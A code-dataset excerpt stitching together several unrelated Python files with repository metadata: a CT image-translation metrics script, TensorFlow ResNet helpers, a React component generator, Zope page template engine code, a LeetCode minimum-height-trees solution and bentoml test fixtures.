            imglist[f] = A_img_nifti.get_fdata(caching = "unchanged").astype(np.int16)
            #print(imglist[f][0,0])
        else:
            print(f + ' does not fit specified input')
    return imglist
def rescale_slices(slices):
    """Map normalized [0, 1] intensities back to the raw range, in place.

    Each value v becomes 4095 * v - 1024 (presumably CT Hounsfield units
    — verify against the data pipeline).  The mutated mapping itself is
    returned for convenience.
    """
    for key, value in slices.items():
        slices[key] = value * 4095 - 1024
    return slices
def read_mask(path):
    """Load every NIfTI mask file in *path* into a dict keyed by filename.

    Unlike read_slices(), every file is assumed to be nibabel-readable
    and no dtype cast is applied.
    """
    # assume folder is for one patient
    filelist = os.listdir(path)
    imglist = {}
    for f in filelist:
        A_img_nifti = nib.load(os.path.join(path, f))
        imglist[f] = A_img_nifti.get_fdata(caching = "unchanged")
    return imglist
def mask_volume(volume, mask):
    """Zero out voxels outside *mask* (element-wise product)."""
    return np.multiply(volume, mask)
if __name__ == "__main__":
    bodymask_path = args.bodymask_path
    real_slices_path = args.real_slices_path
    fake_slices_path = args.fake_slices_path
    results_path = args.results_path
    print('reading real slices from: ' + real_slices_path)
    real_slices = read_slices(real_slices_path)
    print('reading fake slices from: ' + fake_slices_path)
    fake_slices = read_slices(fake_slices_path)
    # NOTE(review): the original printed "rescaling fake slices" here but
    # never called rescale_slices(); the misleading message was removed.
    mask_slices = read_slices(bodymask_path)
    # Record input provenance next to the metrics themselves.
    results = {
        'real_path': real_slices_path,
        'fake_path': fake_slices_path,
        'masks_path': bodymask_path,
    }

    def _report_metrics(diff, label):
        """Print and return MAE/MSE/ME (with SDs) plus MRSE for a 1-D diff.

        This replaces three near-identical copies of the metric code (per
        patient and pooled); MRSE is now also printed for the pooled case.
        """
        abs_diff = np.abs(diff)
        sq_diff = diff ** 2
        mae, sd_ae = abs_diff.mean(), np.std(abs_diff)
        mse, sd_se = sq_diff.mean(), np.std(sq_diff)
        me, sd_e = diff.mean(), np.std(diff)
        print(label + ' MAE: ' + str(mae) + ', SD: ' + str(sd_ae))
        print(label + ' MSE: ' + str(mse) + ', SD: ' + str(sd_se))
        print(label + ' ME: ' + str(me) + ', SD: ' + str(sd_e))
        print(label + ' MRSE: ' + str(np.sqrt(mse)))
        return {
            'mse': float(mse), 'sd_mse': float(sd_se),
            'mae': float(mae), 'sd_mae': float(sd_ae),
            'me': float(me), 'sd_me': float(sd_e)}

    # Patient list with registered data; extend when more registered
    # training data is available.  All files whose names start with one
    # of these prefixes are considered.
    pat = ['PAT1', 'PAT3']
    diff_all_pat = []
    for p in pat:
        print(p)
        real_vol = build_volume(real_slices, p)
        fake_vol = build_volume(fake_slices, p)
        mask = build_volume(mask_slices, p)
        # Compare only voxels inside the body mask.
        fake_vol = mask_volume(fake_vol, mask)
        real_vol = mask_volume(real_vol, mask)
        diff_masked = (real_vol - fake_vol)[mask > 0]
        diff_all_pat.append(diff_masked)
        results[p] = _report_metrics(diff_masked, p)
    # Pooled statistics over the masked voxels of all patients.
    p = 'PAT1+PAT3'
    results[p] = _report_metrics(np.concatenate(diff_all_pat), p)
    print('FID Calculations: ' + str(args.FID))
    if args.FID:
        print('Calculating FID score, this may take a while...')
        fid_value = fid_score.calculate_fid_given_paths(
            [real_slices_path, fake_slices_path],
            batch_size=50,
            device=None,
            dims=2048)
        results['FID'] = float(fid_value)
    with open(results_path, 'w') as file:
        yaml.dump(results, file)
    print(results)
    if args.debug_images:
        # Interactive viewer: real | fake | mask side by side with a slice
        # slider.  Uses the volumes of the LAST patient in `pat`, exactly
        # as the original loop leftovers did.
        def on_change(i):
            img = np.hstack(((real_vol[:, :, i] + 1024) / 4095,
                             (fake_vol[:, :, i] + 1024) / 4095,
                             mask[:, :, i]))
            cv2.imshow('real-fake-mask', img)

        on_change(0)
        # NOTE(review): the slider max (299) is hard-coded; confirm every
        # volume has at least 300 slices.
        cv2.createTrackbar('slider', 'real-fake-mask', 0, 299, on_change)
        while True:
            if cv2.waitKey(0) == 27:  # Esc closes the viewer
                cv2.destroyAllWindows()
                break
| deltahue/DL-Project-2020 | contrastive-unpaired-translation-master/evaluate_metrics.py | evaluate_metrics.py | py | 6,275 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "os.listdir",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "cv2.imread",
"line... |
23167904841 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from collections import namedtuple
import tensorflow as tf
import tensorflow.contrib.slim as slim
class Block(namedtuple('Block', ['scope', 'unit_fn', 'args'])):
    """A named tuple describing a ResNet block.
    Its parts are:
    scope: The scope of the `Block`.
    unit_fn: The ResNet unit function which takes as input a `Tensor` and returns another `Tensor` with the output of the ResNet unit.
    args: A list of length equal to the number of units in the `Block`. The list contains one (depth, depth_bottleneck, stride) tuple for each unit in the block to serve as argument to unit_fn.

    The class adds no behavior of its own; it only names the fields
    consumed by stack_blocks_dense().
    """
def subsample(inputs, factor, scope=None):
    """Subsample `inputs` along the spatial dimensions by `factor`.

    Implemented as a 1x1 max pool with stride `factor`; a factor of 1 is
    the identity and adds no op to the graph.
    """
    if factor == 1:
        return inputs
    else:
        return slim.max_pool2d(inputs, [1, 1], stride=factor, scope=scope) # padding='VALID'
def conv2d_same(inputs, num_outputs, kernel_size, stride, rate=1, scope=None):
    """2-D convolution whose output size is independent of the input size.

    For stride 1 plain 'SAME' padding suffices.  For stride > 1 the input
    is explicitly zero-padded and a 'VALID' convolution is used, so the
    output size is ceil(input / stride) regardless of the input size
    (slim's 'SAME' padding with stride > 1 would depend on it).
    """
    if stride == 1:
        return slim.conv2d(inputs, num_outputs, kernel_size, stride=1, rate=rate, padding='SAME', scope=scope)
    else:
        # Effective kernel extent once dilation (`rate`) is accounted for.
        kernel_size_effective = kernel_size+(kernel_size-1)*(rate-1)
        pad_total = kernel_size_effective-1
        pad_beg = pad_total//2
        pad_end = pad_total-pad_beg
        inputs = tf.pad(inputs, [[0, 0], [pad_beg, pad_end], [pad_beg, pad_end], [0, 0]]) # zero padding
        return slim.conv2d(inputs, num_outputs, kernel_size, stride=stride, rate=rate, padding='VALID', scope=scope)
@slim.add_arg_scope
def stack_blocks_dense(net, blocks, output_stride=None, store_non_strided_activations=False, outputs_collections=None):
    """Stack ResNet `Block`s while controlling the net's output stride.

    Once the accumulated stride reaches `output_stride`, further units run
    with stride 1 and an increased atrous `rate` instead, so the spatial
    resolution stops shrinking (dilated-convolution trick).  Raises
    ValueError if `output_stride` cannot be met exactly.
    """
    current_stride = 1  # product of all strides applied so far
    rate = 1  # current atrous rate
    for block in blocks:
        with tf.variable_scope(block.scope, 'block', [net]) as sc:
            block_stride = 1
            for i, unit in enumerate(block.args):
                if store_non_strided_activations and i == len(block.args)-1:
                    # Move the last unit's stride out of the unit so the
                    # pre-stride activation can be collected; the stride
                    # is applied after the block via subsample() below.
                    block_stride = unit.get('stride', 1)
                    unit = dict(unit, stride=1)
                with tf.variable_scope('unit_%d' % (i+1), values=[net]):
                    if output_stride is not None and current_stride == output_stride:
                        # Target stride reached: trade stride for dilation.
                        net = block.unit_fn(net, rate=rate, **dict(unit, stride=1))
                        rate *= unit.get('stride', 1)
                    else:
                        net = block.unit_fn(net, rate=1, **unit)
                        current_stride *= unit.get('stride', 1)
                        if output_stride is not None and current_stride > output_stride:
                            raise ValueError('The target output_stride cannot be reached.')
            net = slim.utils.collect_named_outputs(outputs_collections, sc.name, net)
            if output_stride is not None and current_stride == output_stride:
                rate *= block_stride
            else:
                net = subsample(net, block_stride)
                current_stride *= block_stride
                if output_stride is not None and current_stride > output_stride:
                    raise ValueError('The target output_stride cannot be reached.')
    if output_stride is not None and current_stride != output_stride:
        raise ValueError('The target output_stride cannot be reached.')
    return net
def resnet_arg_scope(weight_decay=0.0001,
                     batch_norm_decay=0.9,
                     batch_norm_epsilon=2e-5,
                     batch_norm_scale=True,
                     activation_fn=tf.nn.leaky_relu,
                     use_batch_norm=True,
                     batch_norm_updates_collections=tf.GraphKeys.UPDATE_OPS):
    """slim arg_scope with the ResNet defaults used by this project.

    Applies L2 weight decay, Xavier initialization, the given activation
    and (optionally) batch norm to every slim.conv2d, plus 'SAME' padding
    for slim.max_pool2d.  The gamma of batch norm is L2-regularized too.
    """
    batch_norm_params = {
        'decay': batch_norm_decay,
        'epsilon': batch_norm_epsilon,
        'scale': batch_norm_scale,
        'updates_collections': batch_norm_updates_collections,
        'fused': None, # Use fused batch norm if possible.
        'param_regularizers': {'gamma': slim.l2_regularizer(weight_decay)},
    }
    with slim.arg_scope(
        [slim.conv2d],
        weights_regularizer=slim.l2_regularizer(weight_decay),
        weights_initializer=tf.contrib.layers.xavier_initializer(uniform=False),
        activation_fn=activation_fn,
        normalizer_fn=slim.batch_norm if use_batch_norm else None,
        normalizer_params=batch_norm_params):
        with slim.arg_scope([slim.batch_norm], **batch_norm_params):
            with slim.arg_scope([slim.max_pool2d], padding='SAME') as arg_sc:
return arg_sc | luckycallor/InsightFace-tensorflow | backbones/utils.py | utils.py | py | 4,551 | python | en | code | 246 | github-code | 1 | [
{
"api_name": "collections.namedtuple",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "tensorflow.contrib.slim.max_pool2d",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "tensorflow.contrib.slim",
"line_number": 25,
"usage_type": "name"
},
{
... |
21923155762 | #!/usr/bin/python
import json
import os
import sys
config = sys.argv[-1]
# load json content from config file
def load_json():
    """Parse and return the JSON component spec from the path in `config`.

    NOTE: the module later rebinds the global name `json` to this dict
    (shadowing the json module), so this function must run first.
    """
    with open(config) as components:
        return json.load(components)
json = load_json()
# helper function for creating folders
def create_folder(folder_name, prev=None):
    """Create *folder_name* under *prev* (or the CWD) if it is missing.

    BUGFIX: the original returned the new path only when *prev* was None
    and fell off the end (returning None) otherwise; both branches also
    duplicated the join/exists/mkdir logic.  The path is now always
    returned — backward compatible, since the old None return was never
    used by callers.
    """
    base = os.getcwd() if prev is None else prev
    new_folder_path = os.path.join(base, folder_name)
    if not os.path.exists(new_folder_path):
        os.mkdir(new_folder_path)
    return new_folder_path
# create all the respective subfolders folders specified for each component
def create_directories():
    """Create the parent folder from the spec plus one folder per component.

    Here `json` is the loaded spec dict (the module-level assignment
    shadows the json module).  Returns None, so the module-level
    `path = create_directories()` is always None.
    """
    parent = create_folder(json['path'])
    for component in json['components']:
        create_folder(component,parent)
path = create_directories()
# react code template
code_template = """// libraries
import React from "react"
// other components
// style
// utils
const {} = () => {{
return (
<div>This is the {} component</div>
);
}};
export default {};"""
# create javascript files in respective folders
# fill each file with code template
def create_js():
    """Write a boilerplate React component file into each component folder.

    The file is named CapitalizedComponent.js and filled from
    `code_template`.
    """
    for component in json['components']:
        filename = component.capitalize() + ".js"
        # NOTE(review): the path is hard-coded as "components" while
        # create_directories() uses json['path'] — confirm the spec's
        # path is always "components".
        full_file_path = os.path.join("components",component,filename)
        with open(full_file_path,"w") as file:
            file.write(code_template.format(component.capitalize(),component,component.capitalize()))
create_js()
| faddalibrahim/scripts-and-utils | Python/react_component_generator/create.py | create.py | py | 1,563 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "sys.argv",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "json.load",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 19,
... |
704734527 | __docformat__ = 'restructuredtext'
import sys
from zope import component
from zope.interface import implements
from zope.component.interfaces import ComponentLookupError
from zope.traversing.interfaces import IPathAdapter, ITraversable
from zope.traversing.interfaces import TraversalError
from zope.traversing.adapters import traversePathElement
from zope.security.untrustedpython import rcompile
from zope.security.proxy import ProxyFactory, removeSecurityProxy
from zope.security.untrustedpython.builtins import SafeBuiltins
from zope.i18n import translate
from zope.tales.expressions import PathExpr, StringExpr, NotExpr, DeferExpr
from zope.tales.expressions import SimpleModuleImporter
from zope.tales.pythonexpr import PythonExpr
from zope.tales.tales import ExpressionEngine, Context
from i18n import ZopeMessageFactory as _
class InlineCodeError(Exception):
    """Raised when inline code evaluation is disabled or no interpreter exists."""
    pass
class ZopeTraverser(object):
    """Path-segment traverser that can wrap each traversal hop via `proxify`."""
    def __init__(self, proxify=None):
        # Without a proxify callable, traversal results are returned as-is.
        if proxify is None:
            self.proxify = lambda x: x
        else:
            self.proxify = proxify
    def __call__(self, object, path_items, econtext):
        """Traverses a sequence of names, first trying attributes then items.
        """
        request = getattr(econtext, 'request', None)
        path_items = list(path_items)
        path_items.reverse()
        while path_items:
            name = path_items.pop()
            # special-case dicts for performance reasons
            if getattr(object, '__class__', None) == dict:
                object = object[name]
            else:
                object = traversePathElement(object, name, path_items,
                                             request=request)
            # Each intermediate result is (optionally) security-proxied.
            object = self.proxify(object)
        return object
zopeTraverser = ZopeTraverser(ProxyFactory)
class ZopePathExpr(PathExpr):
    """Untrusted `path:` expression; hops go through the proxying traverser."""
    def __init__(self, name, expr, engine):
        super(ZopePathExpr, self).__init__(name, expr, engine, zopeTraverser)
trustedZopeTraverser = ZopeTraverser()
class TrustedZopePathExpr(PathExpr):
    """Trusted `path:` expression; traversal results are not proxied."""
    def __init__(self, name, expr, engine):
        super(TrustedZopePathExpr, self).__init__(name, expr, engine,
                                                  trustedZopeTraverser)
# Create a version of the restricted built-ins that uses a safe
# version of getattr() that wraps values in security proxies where
# appropriate:
class ZopePythonExpr(PythonExpr):
    """`python:` expression compiled and evaluated under restricted Python."""
    def __call__(self, econtext):
        __traceback_info__ = self.text
        # SafeBuiltins stands in for the builtins so the evaluated code
        # only sees security-wrapped primitives.
        vars = self._bind_used_names(econtext, SafeBuiltins)
        return eval(self._code, vars)
    def _compile(self, text, filename):
        # rcompile emits restricted bytecode instead of plain compile().
        return rcompile.compile(text, filename, 'eval')
class ZopeContextBase(Context):
    """Base class for both trusted and untrusted evaluation contexts."""
    def translate(self, msgid, domain=None, mapping=None, default=None):
        """Translate *msgid* in the context of this evaluation's request."""
        return translate(msgid, domain, mapping,
                         context=self.request, default=default)
    # Inline code snippets are disabled unless a subclass/site enables them.
    evaluateInlineCode = False
    def evaluateCode(self, lang, code):
        """Evaluate an inline code snippet written in language *lang*.

        Raises InlineCodeError when inline code is disabled or when no
        interpreter utility is registered for *lang*.  Globals newly
        created by the snippet are copied back into the context.
        """
        if not self.evaluateInlineCode:
            raise InlineCodeError(
                _('Inline Code Evaluation is deactivated, which means that '
                  'you cannot have inline code snippets in your Page '
                  'Template. Activate Inline Code Evaluation and try again.'))
        # TODO This is only needed when self.evaluateInlineCode is true,
        # so should only be needed for zope.app.pythonpage.
        from zope.app.interpreter.interfaces import IInterpreter
        interpreter = component.queryUtility(IInterpreter, lang)
        if interpreter is None:
            error = _('No interpreter named "${lang_name}" was found.',
                      mapping={'lang_name': lang})
            raise InlineCodeError(error)
        globals = self.vars.copy()
        result = interpreter.evaluateRawCode(code, globals)
        # Add possibly new global variables.
        old_names = self.vars.keys()
        for name, value in globals.items():
            if name not in old_names:
                self.setGlobal(name, value)
        return result
class ZopeContext(ZopeContextBase):
"""Evaluation context for untrusted programs."""
def evaluateMacro(self, expr):
"""evaluateMacro gets security-proxied macro programs when this
is run with the zopeTraverser, and in other untrusted
situations. This will cause evaluation to fail in
zope.tal.talinterpreter, which knows nothing of security proxies.
Therefore, this method removes any proxy from the evaluated
expression.
>>> output = [('version', 'xxx'), ('mode', 'html'), ('other', 'things')]
>>> def expression(context):
... return ProxyFactory(output)
...
>>> zc = ZopeContext(ExpressionEngine, {})
>>> out = zc.evaluateMacro(expression)
>>> type(out)
<type 'list'>
The method does some trivial checking to make sure we are getting
back a macro like we expect: it must be a sequence of sequences, in
which the first sequence must start with 'version', and the second
must start with 'mode'.
>>> del output[0]
>>> zc.evaluateMacro(expression) # doctest: +ELLIPSIS
Traceback (most recent call last):
...
ValueError: ('unexpected result from macro evaluation.', ...)
>>> del output[:]
>>> zc.evaluateMacro(expression) # doctest: +ELLIPSIS
Traceback (most recent call last):
...
ValueError: ('unexpected result from macro evaluation.', ...)
>>> output = None
>>> zc.evaluateMacro(expression) # doctest: +ELLIPSIS
Traceback (most recent call last):
...
ValueError: ('unexpected result from macro evaluation.', ...)
"""
macro = removeSecurityProxy(Context.evaluateMacro(self, expr))
# we'll do some basic checks that it is the sort of thing we expect
problem = False
try:
problem = macro[0][0] != 'version' or macro[1][0] != 'mode'
except (TypeError, IndexError):
problem = True
if problem:
raise ValueError('unexpected result from macro evaluation.', macro)
return macro
def setContext(self, name, value):
# Hook to allow subclasses to do things like adding security proxies
Context.setContext(self, name, ProxyFactory(value))
class TrustedZopeContext(ZopeContextBase):
"""Evaluation context for trusted programs."""
class AdapterNamespaces(object):
"""Simulate tales function namespaces with adapter lookup.
When we are asked for a namespace, we return an object that
actually computes an adapter when called:
To demonstrate this, we need to register an adapter:
>>> from zope.component.testing import setUp, tearDown
>>> setUp()
>>> from zope.component import provideAdapter
>>> def adapter1(ob):
... return 1
>>> adapter1.__component_adapts__ = (None,)
>>> provideAdapter(adapter1, None, IPathAdapter, 'a1')
Now, with this adapter in place, we can try out the namespaces:
>>> ob = object()
>>> namespaces = AdapterNamespaces()
>>> namespace = namespaces['a1']
>>> namespace(ob)
1
>>> namespace = namespaces['a2']
>>> namespace(ob)
Traceback (most recent call last):
...
KeyError: 'a2'
Cleanup:
>>> tearDown()
"""
def __init__(self):
self.namespaces = {}
def __getitem__(self, name):
namespace = self.namespaces.get(name)
if namespace is None:
def namespace(object):
try:
return component.getAdapter(object, IPathAdapter, name)
except ComponentLookupError:
raise KeyError(name)
self.namespaces[name] = namespace
return namespace
class ZopeBaseEngine(ExpressionEngine):
    """Expression engine that wires TALES contexts to adapter namespaces."""
    # Subclasses override this to choose trusted/untrusted contexts.
    _create_context = ZopeContext
    def __init__(self):
        ExpressionEngine.__init__(self)
        self.namespaces = AdapterNamespaces()
    def getContext(self, __namespace=None, **namespace):
        """Create an evaluation context for the given variable bindings."""
        if __namespace:
            if namespace:
                namespace.update(__namespace)
            else:
                namespace = __namespace
        context = self._create_context(self, namespace)
        # Put request into context so path traversal can find it
        if 'request' in namespace:
            context.request = namespace['request']
        # Put context into context so path traversal can find it
        if 'context' in namespace:
            context.context = namespace['context']
        return context
class ZopeEngine(ZopeBaseEngine):
"""Untrusted expression engine.
This engine does not allow modules to be imported; only modules
already available may be accessed::
>>> modname = 'zope.pagetemplate.tests.trusted'
>>> engine = _Engine()
>>> context = engine.getContext(engine.getBaseNames())
>>> modname in sys.modules
False
>>> context.evaluate('modules/' + modname)
Traceback (most recent call last):
...
KeyError: 'zope.pagetemplate.tests.trusted'
(The use of ``KeyError`` is an unfortunate implementation detail; I
think this should be a ``TraversalError``.)
Modules which have already been imported by trusted code are
available, wrapped in security proxies::
>>> m = context.evaluate('modules/sys')
>>> m.__name__
'sys'
>>> m._getframe
Traceback (most recent call last):
...
ForbiddenAttribute: ('_getframe', <module 'sys' (built-in)>)
The results of Python expressions evaluated by this engine are
wrapped in security proxies::
>>> r = context.evaluate('python: {12: object()}.values')
>>> type(r)
<type 'zope.security._proxy._Proxy'>
>>> r = context.evaluate('python: {12: object()}.values()[0].__class__')
>>> type(r)
<type 'zope.security._proxy._Proxy'>
General path expressions provide objects that are wrapped in
security proxies as well::
>>> from zope.component.testing import setUp, tearDown
>>> from zope.security.checker import NamesChecker, defineChecker
>>> class Container(dict):
... implements(ITraversable)
... def traverse(self, name, further_path):
... return self[name]
>>> setUp()
>>> defineChecker(Container, NamesChecker(['traverse']))
>>> d = engine.getBaseNames()
>>> foo = Container()
>>> foo.__name__ = 'foo'
>>> d['foo'] = ProxyFactory(foo)
>>> foo['bar'] = bar = Container()
>>> bar.__name__ = 'bar'
>>> bar.__parent__ = foo
>>> bar['baz'] = baz = Container()
>>> baz.__name__ = 'baz'
>>> baz.__parent__ = bar
>>> context = engine.getContext(d)
>>> o1 = context.evaluate('foo/bar')
>>> o1.__name__
'bar'
>>> type(o1)
<type 'zope.security._proxy._Proxy'>
>>> o2 = context.evaluate('foo/bar/baz')
>>> o2.__name__
'baz'
>>> type(o2)
<type 'zope.security._proxy._Proxy'>
>>> o3 = o2.__parent__
>>> type(o3)
<type 'zope.security._proxy._Proxy'>
>>> o1 == o3
True
>>> o1 is o2
False
Note that this engine special-cases dicts during path traversal:
it traverses only to their items, but not to their attributes
(e.g. methods on dicts), because of performance reasons:
>>> d = engine.getBaseNames()
>>> d['adict'] = {'items': 123}
>>> d['anotherdict'] = {}
>>> context = engine.getContext(d)
>>> context.evaluate('adict/items')
123
>>> context.evaluate('anotherdict/keys')
Traceback (most recent call last):
...
KeyError: 'keys'
>>> tearDown()
"""
    def getFunctionNamespace(self, namespacename):
        """Return the named function namespace, wrapped in a security proxy.

        The proxy ensures untrusted template code cannot reach
        unprotected attributes of the namespace object.
        """
        return ProxyFactory(
            super(ZopeEngine, self).getFunctionNamespace(namespacename))
class TrustedZopeEngine(ZopeBaseEngine):
    """Trusted expression engine.
    This engine allows modules to be imported::
        >>> modname = 'zope.pagetemplate.tests.trusted'
        >>> engine = _TrustedEngine()
        >>> context = engine.getContext(engine.getBaseNames())
        >>> modname in sys.modules
        False
        >>> m = context.evaluate('modules/' + modname)
        >>> m.__name__ == modname
        True
        >>> modname in sys.modules
        True
    Since this is trusted code, we can look at whatever is in the
    module, not just __name__ or what's declared in a security
    assertion::
        >>> m.x
        42
    Clean up after ourselves::
        >>> del sys.modules[modname]
    """
    # Trusted contexts evaluate without the security proxying that
    # ZopeEngine applies to expression results.
    _create_context = TrustedZopeContext
class TraversableModuleImporter(SimpleModuleImporter):
    # Adapts module importing to the ITraversable path-traversal protocol
    # so trusted templates can write path expressions like 'modules/os'.
    implements(ITraversable)
    def traverse(self, name, further_path):
        """Import and return the module *name*; raise TraversalError if it
        cannot be imported."""
        try:
            return self[name]
        except KeyError:
            raise TraversalError(self, name)
def _Engine(engine=None):
    """Build and return the default (security-proxied) expression engine."""
    if engine is None:
        engine = ZopeEngine()
    engine = _create_base_engine(engine, ZopePathExpr)
    engine.registerType('python', ZopePythonExpr)
    # Using a proxy around sys.modules allows page templates to use
    # modules for which security declarations have been made, but
    # disallows execution of any import-time code for modules, which
    # should not be allowed to happen during rendering.
    engine.registerBaseName('modules', ProxyFactory(sys.modules))
    return engine
def _TrustedEngine(engine=None):
    """Build and return the trusted (unproxied) expression engine."""
    if engine is None:
        engine = TrustedZopeEngine()
    engine = _create_base_engine(engine, TrustedZopePathExpr)
    engine.registerType('python', PythonExpr)
    # Trusted templates may import and traverse modules directly.
    engine.registerBaseName('modules', TraversableModuleImporter())
    return engine
def _create_base_engine(engine, pathtype):
    """Register the standard TALES expression types on *engine*.

    *pathtype* supplies the path-expression class and its default type
    names; the string/not/defer types are shared by both engines.
    Returns the engine for call chaining.
    """
    for type_name in pathtype._default_type_names:
        engine.registerType(type_name, pathtype)
    for name, expr_class in (('string', StringExpr),
                             ('not', NotExpr),
                             ('defer', DeferExpr)):
        engine.registerType(name, expr_class)
    return engine
Engine = _Engine()
TrustedEngine = _TrustedEngine()
class AppPT(object):
    """Mix-in giving page templates the default (security-proxied) engine."""
    def pt_getEngine(self):
        return Engine
class TrustedAppPT(object):
    """Mix-in giving page templates the trusted (unproxied) engine."""
    def pt_getEngine(self):
        return TrustedEngine
| displacedaussie/gae-zpt | zope/pagetemplate/engine.py | engine.py | py | 14,488 | python | en | code | 3 | github-code | 1 | [
{
"api_name": "zope.traversing.adapters.traversePathElement",
"line_number": 48,
"usage_type": "call"
},
{
"api_name": "zope.security.proxy.ProxyFactory",
"line_number": 53,
"usage_type": "argument"
},
{
"api_name": "zope.tales.expressions.PathExpr",
"line_number": 55,
"u... |
41307675140 | '''
https://leetcode.com/problems/minimum-height-trees/description/
'''
from collections import defaultdict, deque
# there can only be at most two roots in MHT, which are the mid points of the longest path
# find leaves, remove leaves from neighbours
# keep doing as long as num of nodes is > 2
# ones remaining are the root
def findMinHeightTrees(n, edges):
    """Return the root(s) of all minimum-height trees of the graph.

    Repeatedly strips the outermost layer of leaves; the one or two
    survivors are the midpoints of the longest path, i.e. the MHT roots.

    :type n: int
    :type edges: List[List[int]]
    :rtype: List[int]
    """
    # Build an undirected adjacency map.
    neighbours = defaultdict(set)
    for a, b in edges:
        neighbours[a].add(b)
        neighbours[b].add(a)
    remaining = set(range(n))
    while len(remaining) > 2:
        layer = {node for node in remaining if len(neighbours[node]) == 1}
        remaining -= layer
        # Detach each stripped leaf from its single neighbour.
        for leaf in layer:
            for other in neighbours[leaf]:
                neighbours[other].discard(leaf)
    return list(remaining)
print(findMinHeightTrees(6, [[0, 3], [1, 3], [2, 3], [4, 3], [5, 4]])) # [3, 4]
# runs faster due to one lesser for loop, and no set comprehension
def find_min_height_faster(n, edges):
    """Return the MHT root(s) by incremental leaf pruning.

    Faster variant: instead of rescanning all remaining nodes for leaves
    each round, the next leaf set is derived from the nodes whose degree
    just dropped to one.

    :type n: int
    :type edges: List[List[int]]
    :rtype: List[int]
    """
    adjlist = defaultdict(set)
    for u, v in edges:
        adjlist[u].add(v)
        adjlist[v].add(u)
    nodes = set(range(n))
    leaves = {i for i in nodes if len(adjlist[i]) == 1}
    while len(nodes) > 2:
        newleaves = set()
        nodes -= leaves
        for i in leaves:
            # A leaf has exactly one neighbour left; detach that edge.
            j = adjlist[i].pop()
            adjlist[j].remove(i)
            # BUG FIX: removed leftover debug `print(adjlist)` that spammed
            # stdout on every edge removal.
            if len(adjlist[j]) == 1:
                newleaves.add(j)
        leaves = newleaves
    return list(nodes)
# bfs, O(n^2), TLE
# do bfs on each node to find minheight of each node
def findMinHeightTrees(n, edges):
    """Brute force: BFS from every node to find the height of the tree
    rooted there, then return all nodes achieving the minimum height.
    O(n^2) overall; TLE on LeetCode.

    :type n: int
    :type edges: List[List[int]]
    :rtype: List[int]
    """
    adjlist = defaultdict(list)
    for u,v in edges:
        adjlist[u].append(v)
        adjlist[v].append(u)
    levels, ans, minheight = {}, [], float('inf')
    for i in range(n):
        visited, queue = set(), deque([(i, 0)])
        level, height = 0, float('-inf')  # NOTE(review): `height` is never used
        while queue:
            curr, level = queue.popleft()
            visited.add(curr)
            for edge in adjlist[curr]:
                if edge not in visited:
                    queue.append((edge, level+1))
        # BFS pops nodes in nondecreasing depth, so the last `level` seen
        # is the height of the tree rooted at i.
        levels[i] = level
        minheight = min(minheight, level)
    for key, val in levels.items():
        if val == minheight:
            ans.append(key)
    return ans
print(findMinHeightTrees(4, [[1, 0], [1, 2], [1, 3]])) # [1]
| huiwenhw/interview-prep | leetcode_Python/graph_MinHeightTrees.py | graph_MinHeightTrees.py | py | 2,527 | python | en | code | 22 | github-code | 1 | [
{
"api_name": "collections.defaultdict",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "collections.defaultdict",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "collections.defaultdict",
"line_number": 64,
"usage_type": "call"
},
{
"api_name"... |
16748849391 | from __future__ import annotations
import os
import typing as t
import logging
import pathlib
from typing import TYPE_CHECKING
import yaml
import pytest
import bentoml
from bentoml._internal.utils import bentoml_cattr
from bentoml._internal.models import ModelStore
from bentoml._internal.models import ModelContext
from bentoml._internal.bento.build_config import BentoBuildConfig
if TYPE_CHECKING:
from _pytest.python import Metafunc
TEST_MODEL_CONTEXT = ModelContext(
framework_name="testing", framework_versions={"testing": "v1"}
)
def pytest_generate_tests(metafunc: Metafunc) -> None:
    """Pytest hook: disable bentoml usage tracking for the test session.

    The cached tracking flags are cleared so the environment variables set
    below are re-read on the next lookup.
    """
    from bentoml._internal.utils import analytics
    analytics.usage_stats.do_not_track.cache_clear()
    analytics.usage_stats._usage_event_debugging.cache_clear()  # type: ignore (private warning)
    # used for local testing, on CI we already set DO_NOT_TRACK
    os.environ["__BENTOML_DEBUG_USAGE"] = "False"
    os.environ["BENTOML_DO_NOT_TRACK"] = "True"
@pytest.fixture(scope="function")
def noop_service(dummy_model_store: ModelStore) -> bentoml.Service:
    """Build a minimal bentoml Service backed by an identity ("noop") model.

    The model is pickled into *dummy_model_store*, wrapped in a CPU
    runnable, and exposed through a single text API that echoes its input.
    """
    import cloudpickle
    from bentoml.io import Text
    class NoopModel:
        # Identity model: prediction simply returns the input unchanged.
        def predict(self, data: t.Any) -> t.Any:
            return data
    with bentoml.models.create(
        "noop_model",
        context=TEST_MODEL_CONTEXT,
        module=__name__,
        signatures={"predict": {"batchable": True}},
        _model_store=dummy_model_store,
    ) as model:
        with open(model.path_of("test.pkl"), "wb") as f:
            cloudpickle.dump(NoopModel(), f)
    ref = bentoml.models.get("noop_model", _model_store=dummy_model_store)
    class NoopRunnable(bentoml.Runnable):
        SUPPORTED_RESOURCES = ("cpu",)
        SUPPORTS_CPU_MULTI_THREADING = True
        def __init__(self):
            self._model: NoopModel = bentoml.picklable_model.load_model(ref)
        @bentoml.Runnable.method(batchable=True)
        def predict(self, data: t.Any) -> t.Any:
            return self._model.predict(data)
    svc = bentoml.Service(
        name="noop_service",
        runners=[bentoml.Runner(NoopRunnable, models=[ref])],
    )
    @svc.api(input=Text(), output=Text())
    def noop_sync(data: str) -> str: # type: ignore
        return data
    return svc
@pytest.fixture(scope="function", autouse=True, name="propagate_logs")
def fixture_propagate_logs() -> t.Generator[None, None, None]:
    """Temporarily enable propagation on the "bentoml" logger.

    bentoml sets propagate to False by default; pytest's caplog only sees
    records that propagate, so turn it on for the duration of each test.
    """
    logger = logging.getLogger("bentoml")
    logger.propagate = True
    try:
        yield
    finally:
        # BUG FIX: restore propagate even when the test body raises; the
